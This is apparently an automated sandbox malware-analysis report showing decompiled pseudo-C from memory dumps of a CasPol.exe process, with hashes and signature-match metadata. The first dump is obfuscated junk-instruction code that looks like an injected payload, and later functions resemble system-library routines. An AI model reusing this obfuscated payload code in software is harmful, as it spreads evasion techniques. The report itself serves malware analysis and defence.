                                                                					_t47 = _t47 & 0x0000000c;
                                                                					_t55 = (_t55 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
                                                                					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
                                                                					asm("sbb ebp, [0x8771e3b]");
                                                                					_push(_t55);
                                                                					_t54 = _t54 &  *0x912dd0fb;
                                                                					_t52 = _t52 & 0x00000020;
                                                                					asm("rol byte [0xf89935f2], 0x22");
                                                                					asm("rol dword [0xfbe9540d], 0x6c");
                                                                					 *0x9459ca0a = _t50;
                                                                					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
                                                                					asm("adc bl, [0xc320ed3c]");
                                                                					asm("scasb");
                                                                					_t50 =  *0x9459ca0a - 1;
                                                                					 *0xaab74829 =  *0xaab74829 ^ _t47;
                                                                					asm("rcl dword [0x7f106817], 0x35");
                                                                					asm("adc eax, [0x9d56ea15]");
                                                                					_t48 = _t48 +  *0x5ceec7ba &  *0x3b22d9f7;
                                                                					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
                                                                					goto L1;
                                                                				}
                                                                				__ebx = __ebx + 0x4d8c6179;
                                                                				 *0x37f7cf81 =  *0x37f7cf81 - __eax;
                                                                				 *0xb9a68cc6 =  *0xb9a68cc6 << 0xea;
                                                                				_push(__esp);
                                                                				__esp = __esp ^ 0xeb6a169d;
                                                                				__eflags =  *0xfe48edf & __ebx;
                                                                				if(( *0xfe48edf & __ebx) == 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esp = __esp & 0x4b5b4f74;
                                                                				asm("scasb");
                                                                				asm("sbb [0xf34d368c], edi");
                                                                				 *0xdd804932 =  *0xdd804932 >> 0;
                                                                				 *0xa4852eee =  *0xa4852eee + __edi;
                                                                				 *0x4f56cb39 =  *0x4f56cb39 << 0xbd;
                                                                				_push(__esp);
                                                                				asm("adc edi, [0x4b66b867]");
                                                                				__edi & 0xc70faff4 =  *0x5726cbf2 & __bh;
                                                                				__edx = __edx + 1;
                                                                				asm("scasb");
                                                                				 *0x755e6536 =  *0x755e6536 - __esp;
                                                                				asm("rcl dword [0x91febd67], 0x5d");
                                                                				asm("rcr byte [0x43a84b7], 0x21");
                                                                				asm("ror dword [0xe4a793d], 0x73");
                                                                				__eflags =  *0x9ab4493e & __edx;
                                                                				 *0x5b4e7526 =  *0x5b4e7526 ^ __edi;
                                                                				__esp = 0x1e9c31c2;
                                                                				__esp = 0x1e9c31c2 ^  *0x52a2e0bc;
                                                                				asm("scasd");
                                                                				asm("lodsd");
                                                                				asm("rol byte [0x94b6f6ca], 0x25");
                                                                				 *0xa79cd09f & __edx =  *0xb5279eca - __ch;
                                                                				 *0x7ed032e5 =  *0x7ed032e5 << 0x61;
                                                                				__eflags =  *0xa5cf1060 * 0x5e2c -  *0xef866d3d;
                                                                				if( *0xa5cf1060 * 0x5e2c >=  *0xef866d3d) {
                                                                					goto L1;
                                                                				}
                                                                				__ecx =  *0xb33457d * 0x132b;
                                                                				__esp =  *0x4a089969 * 0xfdd6;
                                                                				__ecx =  *0xb33457d * 0x132b -  *0xad50b9cf;
                                                                				__ch =  *0x11f5d332;
                                                                				__edx = __edx & 0x8a020536;
                                                                				asm("rol byte [0x5f88c84], 0x56");
                                                                				 *0x846f74f2 =  *0x846f74f2 - __dl;
                                                                				__eflags =  *0x846f74f2;
                                                                				__edi = 0x60ca05f8;
                                                                				if( *0x846f74f2 != 0) {
                                                                					goto L1;
                                                                				}
                                                                				__eflags = __esi -  *0xca05f87b;
                                                                				asm("adc esi, [0xf88f593f]");
                                                                				__esp =  *0x5530ca05;
                                                                				__ecx =  *0xa05f88d;
                                                                				if(__esi >=  *0xca05f87b) {
                                                                					goto L1;
                                                                				}
                                                                				 *0xf87d6171 =  *0xf87d6171 << 0x31;
                                                                				__eax = __eax -  *0x1e02f703;
                                                                				 *0x62c20b04 =  *0x62c20b04 ^ __al;
                                                                				__dl = __dl & 0x000000f9;
                                                                				__eflags =  *0x85a104f9 & __al;
                                                                				__edx = __edx +  *0xa204f96f;
                                                                				 *0x5f9718c & __edx =  *0x713a183d - __edi;
                                                                				__ebx = __ebx |  *0x485105f8;
                                                                				__eflags = __ebx;
                                                                				if(__ebx != 0) {
                                                                					goto L1;
                                                                				}
                                                                				 *0x8c05f87b =  *0x8c05f87b - __esi;
                                                                				__esi = __esi - 1;
                                                                				__eflags = __esi;
                                                                				_push(__esp);
                                                                				if(__esi >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				__ebx = __ebx |  *0xc907f879;
                                                                				 *0x7b490cd2 & __bh =  *0xb3073389 & __edx;
                                                                				asm("lodsd");
                                                                				__edi = __edi & 0x876e1ece;
                                                                				__eflags =  *0x34900733 & __ebx;
                                                                				asm("adc [0x8d7818d5], edx");
                                                                				__edi = __edi &  *0x31990733;
                                                                				__bl = __bl ^ 0x000000c9;
                                                                				 *0x339575ff = __ecx;
                                                                				__eflags = __bl & 0x00000008;
                                                                				if((__bl & 0x00000008) != 0) {
                                                                					goto L1;
                                                                				}
                                                                				__edi = __edi +  *0x6a57407b;
                                                                				__eflags = __edi;
                                                                				if(__edi != 0) {
                                                                					goto L1;
                                                                				}
                                                                				__eflags =  *0xfb368575 & __ebx;
                                                                				__edi =  *0x645ed711;
                                                                				asm("ror dword [0xa2fd62c8], 0x46");
                                                                				 *0xf94a5b17 =  *0xf94a5b17 >> 0xbc;
                                                                				__edi =  *0x645ed711 | 0x8eeac82e;
                                                                				asm("adc al, [0x691407c6]");
                                                                				__bh = __bh -  *0xff3a12c;
                                                                				asm("sbb ch, [0x4cf2d7b6]");
                                                                				 *0x2bb3899b =  *0x2bb3899b & __ebx;
                                                                				asm("rcl dword [0x12a35365], 0x54");
                                                                				 *0x6a3d55c8 =  *0x6a3d55c8 >> 0x89;
                                                                				__edi = ( *0x645ed711 | 0x8eeac82e) +  *0xde983ecd;
                                                                				__eflags = __bl & 0x0000002c;
                                                                				__edi = ( *0x645ed711 | 0x8eeac82e) +  *0xde983ecd + 0xa2192c1f;
                                                                				asm("adc [0xdcd76ec6], bl");
                                                                				 *0x96b50b34 =  *0x96b50b34 ^ __ch;
                                                                				asm("adc bh, 0xa8");
                                                                				__esi = __esi & 0x49eddfc5;
                                                                				 *0x753543e1 =  *0x753543e1 | __dl;
                                                                				_push( *0x37c42c06);
                                                                				asm("movsw");
                                                                				__esp =  *0x580c4460 * 0x30d7;
                                                                				__eflags = __edx -  *0x80e72481;
                                                                				__esi = __esi -  *0x6d06f40d;
                                                                				__eflags = __esi;
                                                                				if(__esi > 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("adc edx, [0x3a520777]");
                                                                				__bh = __bh &  *0xcab003e5;
                                                                				_t36 = __ebx;
                                                                				__ebx =  *0x21e11633;
                                                                				 *0x21e11633 = _t36;
                                                                				_pop( *0x1e86ea9f);
                                                                				asm("adc edi, 0xce5d00bc");
                                                                				__edx = __edx +  *0x7bce6198;
                                                                				 *0x27d00fda =  *0x27d00fda >> 0x8a;
                                                                				__ecx = __ecx +  *0x14fb50cd;
                                                                				asm("sbb [0xb684e311], edx");
                                                                				__ch = __ch ^ 0x000000e1;
                                                                				 *0x8e6142b1 =  *0x8e6142b1 >> 0x5a;
                                                                				__eflags =  *0x485a289 & __ecx;
                                                                				asm("adc esp, 0xb636bbc");
                                                                				 *0x31091c07 =  *0x31091c07 << 0x7b;
                                                                				asm("adc dl, 0xd7");
                                                                				_push(__esp);
                                                                				asm("sbb eax, [0x16b88c03]");
                                                                				 *0x359a40a =  *0x359a40a + __dl;
                                                                				__eflags =  *0x359a40a;
                                                                				asm("rcl dword [0x3d21200e], 0x59");
                                                                				if( *0x359a40a > 0) {
                                                                					goto L1;
                                                                				}
                                                                				asm("adc [0xcc63a277], eax");
                                                                				asm("ror byte [0xdc371d82], 0x1c");
                                                                				__edi = __edi - 0x8a3f2829;
                                                                				__dl = __dl & 0x00000010;
                                                                				 *0x3c13fb25 =  *0x3c13fb25 - 0x733cbcda;
                                                                				__edi =  *0x91d5846b * 0x89a3;
                                                                				__ecx = __ecx + 1;
                                                                				__eflags = __ecx;
                                                                				if(__ecx >= 0) {
                                                                					goto L1;
                                                                				}
                                                                				__edx = __edx ^  *0xc812f879;
                                                                				__eflags = __edx;
                                                                				 *0xc5dd22dd = __esp;
                                                                				_t39 = __edx;
                                                                				__edx =  *0x92790ad9;
                                                                				 *0x92790ad9 = _t39;
                                                                				if(__eflags < 0) {
                                                                					goto L1;
                                                                				}
                                                                				__esi =  *0x122a067c * 0x5fed;
                                                                				_pop(__edx);
                                                                				_pop( *0xe1d49003);
                                                                				__ecx = __ecx - 1;
                                                                				asm("adc edx, [0xe04c91cc]");
                                                                				 *0xcc721d62 & 0x733cbcda = 0x733cbcda -  *0x7d7d1517;
                                                                				asm("ror dword [0xcbc195f4], 0xdd");
                                                                				asm("adc ah, 0x34");
                                                                				__eflags = __eax -  *0x8e331535;
                                                                				 *0xb178d83a = __bh;
                                                                				__eflags = __ebx & 0xf60f1e05;
                                                                				__esp = __esp + 1;
                                                                				asm("ror dword [0x16738f0e], 0x37");
                                                                				__bl = __bl ^ 0x00000084;
                                                                				__eax = __eax - 1;
                                                                				_pop( *0x791f5cf1);
                                                                				__eax = __eax - 1;
                                                                				__ecx =  *0x9d4f7239;
                                                                				asm("rol dword [0x4e3cbb67], 0xcc");
                                                                				__edi = __edi -  *0x8e138192;
                                                                				__eflags =  *0xc04b858d & __ecx;
                                                                				asm("sbb al, 0xe3");
                                                                				 *0xc43a02b8 =  *0xc43a02b8 &  *0x122a067c * 0x00005fed;
                                                                				asm("rol byte [0xd0ae5420], 0xa2");
                                                                				__esi =  *0x270e546b * 0xfdd6;
                                                                				__esi =  *0x270e546b * 0xfdd6 - 1;
                                                                				asm("stosb");
                                                                				__eflags = __ecx -  *0xa9d925da;
                                                                				_pop( *0xb864e79e);
                                                                				asm("ror byte [0xb2ca11b1], 0x61");
                                                                				asm("sbb edi, 0xd93e5c36");
                                                                				__eflags =  *0x5b29550b - __ecx;
                                                                				 *0x91d4c3cf =  *0x91d4c3cf & 0x733cbcda;
                                                                				__edx = __edx ^  *0x1907009e;
                                                                				asm("rcr byte [0x2ee1e1e1], 0xff");
                                                                				asm("adc eax, [0x27d53933]");
                                                                				_push(__esp);
                                                                				__eflags = __esi -  *0xc7adc627;
                                                                				if(__esi <  *0xc7adc627) {
                                                                					goto L1;
                                                                				}
                                                                				__eflags = __esi - 0x1a703472;
                                                                				asm("scasb");
                                                                				__ebx = __ebx +  *0x52f3898;
                                                                				 *0x29d0e361 =  *0x29d0e361 << 0xac;
                                                                				__eflags =  *0x29d0e361;
                                                                				return __eax;
                                                                			}











                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a0ccbbb0ae813c27ea6eb076c657408417a897c76648a9eb78513fc97f73f30d
                                                                • Instruction ID: 1ff6dee43313cb04a8917b1ecbcd4ff0723e68af32a410c60452719ce5854dd7
                                                                • Opcode Fuzzy Hash: a0ccbbb0ae813c27ea6eb076c657408417a897c76648a9eb78513fc97f73f30d
                                                                • Instruction Fuzzy Hash: F7C16572A09791CFE702DF35D88A7513BB1F792324F58428ED8A1631E2D338152ADF89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 90%
                                                                			E016F1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				intOrPtr _t97;
                                                                				signed int _t101;
                                                                				signed int _t112;
                                                                				unsigned int _t113;
                                                                				signed int _t121;
                                                                				signed int _t128;
                                                                				signed int _t130;
                                                                				signed char _t135;
                                                                				intOrPtr _t136;
                                                                				intOrPtr _t137;
                                                                				signed int _t139;
                                                                				signed int _t141;
                                                                				signed int _t143;
                                                                				signed int _t144;
                                                                				signed int _t149;
                                                                				signed int _t150;
                                                                				void* _t154;
                                                                				signed int* _t161;
                                                                				signed int _t163;
                                                                				signed int _t164;
                                                                				void* _t167;
                                                                				intOrPtr _t171;
                                                                				signed int _t172;
                                                                				void* _t175;
                                                                				signed int* _t178;
                                                                				signed int _t179;
                                                                				signed int _t180;
                                                                				signed char _t181;
                                                                				signed char _t183;
                                                                				signed int _t187;
                                                                				signed int _t189;
                                                                				signed int _t190;
                                                                				void* _t191;
                                                                				void* _t197;
                                                                
                                                                				_t137 = __ecx;
                                                                				_push(0x64);
                                                                				_push(0x1701070);
                                                                				E0167D08C(__ebx, __edi, __esi);
                                                                				 *(_t191 - 0x24) = __edx;
                                                                				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
                                                                				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
                                                                				_t135 = 0;
                                                                				 *(_t191 - 0x40) = 0;
                                                                				_t171 =  *((intOrPtr*)(__ecx + 0xc));
                                                                				_t189 =  *(__ecx + 8);
                                                                				 *(_t191 - 0x28) = _t189;
                                                                				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
                                                                				 *(_t191 - 0x50) = _t189;
                                                                				_t187 = __edx << 0xf;
                                                                				 *(_t191 - 0x4c) = _t187;
                                                                				_t190 = 0x8000;
                                                                				 *(_t191 - 0x34) = 0x8000;
                                                                				_t172 = _t171 - _t187;
                                                                				if(_t172 <= 0x8000) {
                                                                					_t190 = _t172;
                                                                					 *(_t191 - 0x34) = _t172;
                                                                				}
                                                                				 *(_t191 - 0x68) = _t135;
                                                                				 *(_t191 - 0x64) = _t135;
                                                                				L3:
                                                                				while(1) {
                                                                					if( *(_t191 + 8) != 0) {
                                                                						L22:
                                                                						 *(_t191 + 8) = _t135;
                                                                						E016F337F(_t137, 1, _t191 - 0x74);
                                                                						_t97 =  *((intOrPtr*)(_t191 - 0x20));
                                                                						_t175 =  *(_t97 + 0x14);
                                                                						 *(_t191 - 0x58) = _t175;
                                                                						_t139 = _t97 + 0x14;
                                                                						 *(_t191 - 0x44) = _t139;
                                                                						_t197 = _t175 - 0xffffffff;
                                                                						if(_t197 == 0) {
                                                                							 *_t139 =  *(_t191 - 0x24);
                                                                							E016F33B6(_t191 - 0x74);
                                                                							 *(_t191 - 0x40) = 1;
                                                                							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
                                                                							_t101 =  *_t60;
                                                                							_t141 =  *(_t191 - 0x24);
                                                                							asm("bt [eax], ecx");
                                                                							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
                                                                							if(__eflags == 0) {
                                                                								goto L41;
                                                                							} else {
                                                                								_t103 = _t187 - 1 + _t190;
                                                                								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
                                                                								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
                                                                									goto L41;
                                                                								} else {
                                                                									__eflags = _t190 - 1;
                                                                									if(__eflags > 0) {
                                                                										_t143 =  *(_t191 - 0x28);
                                                                										_t178 = _t143 + (_t187 >> 5) * 4;
                                                                										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
                                                                										 *(_t191 - 0x50) = _t144;
                                                                										_t112 =  *_t178;
                                                                										 *(_t191 - 0x54) = _t112;
                                                                										_t113 = _t112 | 0xffffffff;
                                                                										__eflags = _t178 - _t144;
                                                                										if(_t178 != _t144) {
                                                                											_t103 = _t113 << _t187;
                                                                											__eflags =  *_t178 & _t103;
                                                                											if(( *_t178 & _t103) != 0) {
                                                                												goto L41;
                                                                											} else {
                                                                												_t103 =  *(_t191 - 0x50);
                                                                												while(1) {
                                                                													_t178 =  &(_t178[1]);
                                                                													__eflags = _t178 - _t103;
                                                                													if(_t178 == _t103) {
                                                                														break;
                                                                													}
                                                                													__eflags =  *_t178 - _t135;
                                                                													if( *_t178 != _t135) {
                                                                														goto L41;
                                                                													} else {
                                                                														continue;
                                                                													}
                                                                													goto L42;
                                                                												}
                                                                												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
                                                                												__eflags = _t103;
                                                                												_t149 =  *_t178;
                                                                												goto L38;
                                                                											}
                                                                										} else {
                                                                											_t154 = 0x20;
                                                                											_t103 = _t113 >> _t154 - _t190 << _t187;
                                                                											_t149 =  *(_t191 - 0x54);
                                                                											L38:
                                                                											_t150 = _t149 & _t103;
                                                                											__eflags = _t150;
                                                                											asm("sbb cl, cl");
                                                                											_t135 =  ~_t150 + 1;
                                                                											_t141 =  *(_t191 - 0x24);
                                                                											goto L39;
                                                                										}
                                                                									} else {
                                                                										if(__eflags != 0) {
                                                                											goto L41;
                                                                										} else {
                                                                											_t103 =  *(_t191 - 0x28);
                                                                											asm("bt [eax], edi");
                                                                											if(__eflags >= 0) {
                                                                												L40:
                                                                												_t136 =  *((intOrPtr*)(_t191 - 0x20));
                                                                												asm("lock btr [eax], ecx");
                                                                												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
                                                                												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
                                                                												_push(0x4000);
                                                                												_push(_t191 - 0x5c);
                                                                												_push(_t191 - 0x60);
                                                                												_push(0xffffffff);
                                                                												_t103 = E016696E0();
                                                                											} else {
                                                                												L39:
                                                                												__eflags = _t135;
                                                                												if(_t135 == 0) {
                                                                													goto L41;
                                                                												} else {
                                                                													goto L40;
                                                                												}
                                                                											}
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						} else {
                                                                							E016F33B6(_t191 - 0x74);
                                                                							_t172 = _t191 - 0x58;
                                                                							E0165E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1715880);
                                                                							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
                                                                							_t121 =  *_t51;
                                                                							asm("bt [eax], ecx");
                                                                							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
                                                                							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
                                                                								goto L41;
                                                                							} else {
                                                                								_t137 =  *((intOrPtr*)(_t191 - 0x20));
                                                                								continue;
                                                                							}
                                                                						}
                                                                					} else {
                                                                						 *(_t191 - 4) = _t135;
                                                                						_t103 = _t187 - 1 + _t190;
                                                                						 *(_t191 - 0x30) = _t103;
                                                                						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
                                                                							__eflags = _t190 - 1;
                                                                							if(__eflags > 0) {
                                                                								_t179 =  *(_t191 - 0x28);
                                                                								_t161 = _t179 + (_t187 >> 5) * 4;
                                                                								 *(_t191 - 0x2c) = _t161;
                                                                								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
                                                                								 *(_t191 - 0x44) = _t128;
                                                                								_t180 =  *_t161;
                                                                								__eflags = _t161 - _t128;
                                                                								if(_t161 != _t128) {
                                                                									_t103 = (_t128 | 0xffffffff) << _t187;
                                                                									__eflags = _t103 & _t180;
                                                                									if((_t103 & _t180) != 0) {
                                                                										goto L5;
                                                                									} else {
                                                                										_t130 =  *(_t191 - 0x2c);
                                                                										_t164 =  *(_t191 - 0x44);
                                                                										while(1) {
                                                                											_t130 = _t130 + 4;
                                                                											 *(_t191 - 0x2c) = _t130;
                                                                											_t180 =  *_t130;
                                                                											__eflags = _t130 - _t164;
                                                                											if(_t130 == _t164) {
                                                                												break;
                                                                											}
                                                                											__eflags = _t180;
                                                                											if(_t180 == 0) {
                                                                												continue;
                                                                											} else {
                                                                												goto L5;
                                                                											}
                                                                											goto L19;
                                                                										}
                                                                										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
                                                                										__eflags = _t103;
                                                                										goto L17;
                                                                									}
                                                                								} else {
                                                                									_t167 = 0x20;
                                                                									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
                                                                									L17:
                                                                									_t183 =  ~(_t180 & _t103);
                                                                									asm("sbb dl, dl");
                                                                									goto L18;
                                                                								}
                                                                							} else {
                                                                								if(__eflags != 0) {
                                                                									goto L5;
                                                                								} else {
                                                                									_t103 =  *(_t191 - 0x28);
                                                                									asm("bt [eax], edi");
                                                                									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
                                                                									asm("sbb dl, dl");
                                                                									L18:
                                                                									_t181 = _t183 + 1;
                                                                									__eflags = _t181;
                                                                								}
                                                                							}
                                                                						} else {
                                                                							L5:
                                                                							_t181 = _t135;
                                                                						}
                                                                						L19:
                                                                						 *(_t191 - 0x19) = _t181;
                                                                						_t163 = _t181 & 0x000000ff;
                                                                						 *(_t191 - 0x48) = _t163;
                                                                						 *(_t191 - 4) = 0xfffffffe;
                                                                						if(_t163 == 0) {
                                                                							L41:
                                                                							_t136 =  *((intOrPtr*)(_t191 - 0x20));
                                                                						} else {
                                                                							_t137 =  *((intOrPtr*)(_t191 - 0x20));
                                                                							goto L22;
                                                                						}
                                                                					}
                                                                					L42:
                                                                					__eflags =  *(_t191 - 0x40);
                                                                					if( *(_t191 - 0x40) != 0) {
                                                                						_t91 = _t136 + 0x14; // 0x14
                                                                						_t142 = _t91;
                                                                						 *_t91 = 0xffffffff;
                                                                						__eflags = 0;
                                                                						asm("lock or [eax], edx");
                                                                						_t103 = E0165DFDF(_t91, 1, _t142);
                                                                					}
                                                                					return E0167D0D1(_t103);
                                                                				}
                                                                			}






































                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4293f3f1a4a701a0cf1ce622960aaf7ed6d0c8d033dd43d38277f9a81047316a
                                                                • Instruction ID: bbbb6d936f4dc4f430b7000addc4136468e3fc8ef567c92ddaeda59b6d5ee792
                                                                • Opcode Fuzzy Hash: 4293f3f1a4a701a0cf1ce622960aaf7ed6d0c8d033dd43d38277f9a81047316a
                                                                • Instruction Fuzzy Hash: 07816B31E01219CFDF18DFA8C8809ECBBB2BF5A354B14422DE612AB3D5DB319946CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E0162C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                                				signed int _v8;
                                                                				char _v1036;
                                                                				signed int _v1040;
                                                                				char _v1048;
                                                                				signed int _v1052;
                                                                				signed char _v1056;
                                                                				void* _v1058;
                                                                				char _v1060;
                                                                				signed int _v1064;
                                                                				void* _v1068;
                                                                				intOrPtr _v1072;
                                                                				void* _v1084;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				intOrPtr _t70;
                                                                				intOrPtr _t72;
                                                                				signed int _t74;
                                                                				intOrPtr _t77;
                                                                				signed int _t78;
                                                                				signed int _t81;
                                                                				void* _t101;
                                                                				signed int _t102;
                                                                				signed int _t107;
                                                                				signed int _t109;
                                                                				signed int _t110;
                                                                				signed char _t111;
                                                                				signed int _t112;
                                                                				signed int _t113;
                                                                				signed int _t114;
                                                                				intOrPtr _t116;
                                                                				void* _t117;
                                                                				char _t118;
                                                                				void* _t120;
                                                                				char _t121;
                                                                				signed int _t122;
                                                                				signed int _t123;
                                                                				signed int _t125;
                                                                
                                                                				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                                				_v8 =  *0x171d360 ^ _t125;
                                                                				_t116 = _a4;
                                                                				_v1056 = _a16;
                                                                				_v1040 = _a24;
                                                                				if(E01636D30( &_v1048, _a8) < 0) {
                                                                					L4:
                                                                					_pop(_t117);
                                                                					_pop(_t120);
                                                                					_pop(_t101);
                                                                					return E0166B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                                				}
                                                                				_t70 = _a20;
                                                                				if(_t70 >= 0x3f4) {
                                                                					_t121 = _t70 + 0xc;
                                                                					L19:
                                                                					_t107 =  *( *[fs:0x30] + 0x18);
                                                                					__eflags = _t107;
                                                                					if(_t107 == 0) {
                                                                						L60:
                                                                						_t68 = 0xc0000017;
                                                                						goto L4;
                                                                					}
                                                                					_t72 =  *0x1717b9c; // 0x0
                                                                					_t74 = L01644620(_t107, _t107, _t72 + 0x180000, _t121);
                                                                					_v1064 = _t74;
                                                                					__eflags = _t74;
                                                                					if(_t74 == 0) {
                                                                						goto L60;
                                                                					}
                                                                					_t102 = _t74;
                                                                					_push( &_v1060);
                                                                					_push(_t121);
                                                                					_push(_t74);
                                                                					_push(2);
                                                                					_push( &_v1048);
                                                                					_push(_t116);
                                                                					_t122 = E01669650();
                                                                					__eflags = _t122;
                                                                					if(_t122 >= 0) {
                                                                						L7:
                                                                						_t114 = _a12;
                                                                						__eflags = _t114;
                                                                						if(_t114 != 0) {
                                                                							_t77 = _a20;
                                                                							L26:
                                                                							_t109 =  *(_t102 + 4);
                                                                							__eflags = _t109 - 3;
                                                                							if(_t109 == 3) {
                                                                								L55:
                                                                								__eflags = _t114 - _t109;
                                                                								if(_t114 != _t109) {
                                                                									L59:
                                                                									_t122 = 0xc0000024;
                                                                									L15:
                                                                									_t78 = _v1052;
                                                                									__eflags = _t78;
                                                                									if(_t78 != 0) {
                                                                										L016477F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                                									}
                                                                									_t68 = _t122;
                                                                									goto L4;
                                                                								}
                                                                								_t110 = _v1056;
                                                                								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                								_v1060 = _t118;
                                                                								__eflags = _t110;
                                                                								if(_t110 == 0) {
                                                                									L10:
                                                                									_t122 = 0x80000005;
                                                                									L11:
                                                                									_t81 = _v1040;
                                                                									__eflags = _t81;
                                                                									if(_t81 == 0) {
                                                                										goto L15;
                                                                									}
                                                                									__eflags = _t122;
                                                                									if(_t122 >= 0) {
                                                                										L14:
                                                                										 *_t81 = _t118;
                                                                										goto L15;
                                                                									}
                                                                									__eflags = _t122 - 0x80000005;
                                                                									if(_t122 != 0x80000005) {
                                                                										goto L15;
                                                                									}
                                                                									goto L14;
                                                                								}
                                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                                								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                                									goto L10;
                                                                								}
                                                                								_push( *((intOrPtr*)(_t102 + 8)));
                                                                								_t59 = _t102 + 0xc; // 0xc
                                                                								_push(_t110);
                                                                								L54:
                                                                								E0166F3E0();
                                                                								_t125 = _t125 + 0xc;
                                                                								goto L11;
                                                                							}
                                                                							__eflags = _t109 - 7;
                                                                							if(_t109 == 7) {
                                                                								goto L55;
                                                                							}
                                                                							_t118 = 4;
                                                                							__eflags = _t109 - _t118;
                                                                							if(_t109 != _t118) {
                                                                								__eflags = _t109 - 0xb;
                                                                								if(_t109 != 0xb) {
                                                                									__eflags = _t109 - 1;
                                                                									if(_t109 == 1) {
                                                                										__eflags = _t114 - _t118;
                                                                										if(_t114 != _t118) {
                                                                											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                											_v1060 = _t118;
                                                                											__eflags = _t118 - _t77;
                                                                											if(_t118 > _t77) {
                                                                												goto L10;
                                                                											}
                                                                											_push(_t118);
                                                                											_t56 = _t102 + 0xc; // 0xc
                                                                											_push(_v1056);
                                                                											goto L54;
                                                                										}
                                                                										__eflags = _t77 - _t118;
                                                                										if(_t77 != _t118) {
                                                                											L34:
                                                                											_t122 = 0xc0000004;
                                                                											goto L15;
                                                                										}
                                                                										_t111 = _v1056;
                                                                										__eflags = _t111 & 0x00000003;
                                                                										if((_t111 & 0x00000003) == 0) {
                                                                											_v1060 = _t118;
                                                                											__eflags = _t111;
                                                                											if(__eflags == 0) {
                                                                												goto L10;
                                                                											}
                                                                											_t42 = _t102 + 0xc; // 0xc
                                                                											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                                											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                                											_push(_t111);
                                                                											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                                											_push(0);
                                                                											_push( &_v1048);
                                                                											_t122 = E016613C0(_t102, _t118, _t122, __eflags);
                                                                											L44:
                                                                											_t118 = _v1072;
                                                                											goto L11;
                                                                										}
                                                                										_t122 = 0x80000002;
                                                                										goto L15;
                                                                									}
                                                                									_t122 = 0xc0000024;
                                                                									goto L44;
                                                                								}
                                                                								__eflags = _t114 - _t109;
                                                                								if(_t114 != _t109) {
                                                                									goto L59;
                                                                								}
                                                                								_t118 = 8;
                                                                								__eflags = _t77 - _t118;
                                                                								if(_t77 != _t118) {
                                                                									goto L34;
                                                                								}
                                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                									goto L34;
                                                                								}
                                                                								_t112 = _v1056;
                                                                								_v1060 = _t118;
                                                                								__eflags = _t112;
                                                                								if(_t112 == 0) {
                                                                									goto L10;
                                                                								}
                                                                								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                                								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                                								goto L11;
                                                                							}
                                                                							__eflags = _t114 - _t118;
                                                                							if(_t114 != _t118) {
                                                                								goto L59;
                                                                							}
                                                                							__eflags = _t77 - _t118;
                                                                							if(_t77 != _t118) {
                                                                								goto L34;
